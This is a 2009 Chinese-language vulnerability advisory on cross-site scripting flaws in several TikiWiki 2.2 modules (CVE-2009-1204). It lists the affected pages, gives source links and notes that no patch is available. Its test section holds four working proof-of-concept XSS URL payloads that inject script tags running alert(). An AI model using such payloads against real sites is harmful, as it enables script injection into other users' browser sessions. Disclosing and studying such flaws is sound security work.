发布日期：2009-03-12
更新日期：2009-03-16

受影响系统：

TikiWiki Project TikiWiki 2.2

描述：

---

BUGTRAQ  ID: 34105,34106,34107,34108
CVE(CAN) ID: CVE-2009-1204

TikiWiki是一款网站内容管理系统，基于PHP+ADOdb+Smarty等技术构建。

TikiWiki的tiki-list_file_gallery.php、tiki-listpages.php、tiki-orphan_pages.php等模块没有正确地验证用户通过URL所提交的输入，如果用户受骗跟随了恶意链接就会导致跨站脚本攻击，在用户浏览器会话中执行任意HTML和脚本代码。

<*来源：iliz （iliz-z@yandex.ru）
  
  链接：http://secunia.com/advisories/34273/
        http://marc.info/?l=bugtraq&m=123687155121145&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/tiki-galleries.php/>"><Script>alert(1)</scRipt>
/tiki-list_file_gallery.php/>"><Script>alert(2)</scRipt>
/tiki-listpages.php/>"><Script>alert(3)</scRipt>
/tiki-orphan_pages.php/>"><Script>alert(4)</scRipt>

建议：

---

厂商补丁：

TikiWiki Project
----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://tikiwiki.org/tiki-index.ph

浏览次数：2362
严重程度：0（网友投票）